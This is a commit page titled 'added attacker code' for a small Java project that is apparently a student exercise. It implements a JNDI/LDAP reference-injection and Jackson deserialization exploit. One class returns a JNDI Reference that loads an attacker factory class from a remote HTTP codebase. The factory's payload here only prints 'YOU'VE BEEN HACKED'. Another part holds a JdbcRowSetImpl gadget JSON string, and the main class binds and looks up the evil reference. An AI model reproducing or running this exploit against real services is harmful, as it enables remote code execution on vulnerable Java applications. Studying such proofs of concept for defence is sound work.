Commit 985b6ba2 authored by Quentin Rossettini's avatar Quentin Rossettini

added attacker code

parent aa803ebf
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.8">
<accessrules>
<accessrule kind="accessible" pattern="com/sun/rowset/**"/>
</accessrules>
</classpathentry>
<classpathentry kind="lib" path="/Users/quentin/Downloads/jackson-annotations-2.7.0.jar"/>
<classpathentry kind="lib" path="/Users/quentin/Downloads/jackson-core-2.7.0.jar"/>
<classpathentry kind="lib" path="/Users/quentin/Downloads/jackson-databind-2.7.0.jar"/>
<classpathentry kind="output" path="bin"/>
</classpath>
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>exam</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.8
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.8
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.8
package test;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
public class Apartment implements Referenceable {
private String size;
public String location;
public Apartment(String size,String location){
this.size=size;
this.location=location;
}
@Override
public Reference getReference() throws NamingException {
String classname = Apartment.class.getName();
StringRefAddr classref =
new StringRefAddr("Apartment details", size+ ":" +location);
String classfactoryname="test.ApartmentFactory";
System.out.println(classfactoryname);
Reference ref = new Reference(classname,classref,classfactoryname,"http://192.168.43.243:8000/");
return ref;
}
@Override
public String toString() {
return "Apartment [size=" + size + ", location=" + location + "]";
}
}
package test;
import java.awt.Button;
import java.awt.Color;
import java.awt.Rectangle;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import javax.swing.JFrame;
import javax.swing.JPanel;
public class ApartmentFactory implements ObjectFactory {
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)
throws Exception {
for(int i = 0; i < 100; i++){System.out.println("YOU'VE BEEN HACKED!!!!");}
/*JFrame frame = new JFrame("YOU'VE BEEN HACKED!!!!");
frame.setSize(1500, 700);
JPanel panel = new JPanel();
//panel.getGraphics().drawString("YOU'VE BEEN HACKED!!!!", 0, 0);
panel.setBackground(Color.BLACK);
frame.add(new Button("YOU'VE BEEN HACKED!!!!"));
frame.setVisible(true);*/
return null;
}
}
package test;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.ObjectMapper.DefaultTyping;
public class Main {
static String jsonInput = "{\"@class\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:10389/cn=apartment16,dc=example,dc=com\", \"autoCommit\":true}";
public static void main(String[] args){
/*try{
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(DefaultTyping.OBJECT_AND_NON_CONCRETE,JsonTypeInfo.As.PROPERTY);
Object o = mapper.readValue(jsonInput, Object.class);
System.out.println(o.getClass());
}catch(Exception e){
e.printStackTrace();
}*/
// Pour peupler le serveur LDAP
/*Hashtable env = new Hashtable();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:10389");
env.put(Context.SECURITY_PRINCIPAL,"uid=admin,ou=system");
env.put(Context.SECURITY_CREDENTIALS,"secret");
env.put(Context.SECURITY_AUTHENTICATION,"simple");
try{
DirContext ctx = new InitialDirContext(env);
ctx.bind("cn=evilreference4,dc=example,dc=com", new Apartment("10m2", "Paris"));
}catch(Exception e){
e.printStackTrace();
}*/
// Pour récupérer la référence
try{
DirContext ctx2 = new InitialDirContext();
Object a = ctx2.lookup("ldap://localhost:10389/cn=evilreference4,dc=example,dc=com");
System.out.println(a);
}catch(Exception e){
e.printStackTrace();
}
}
}
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment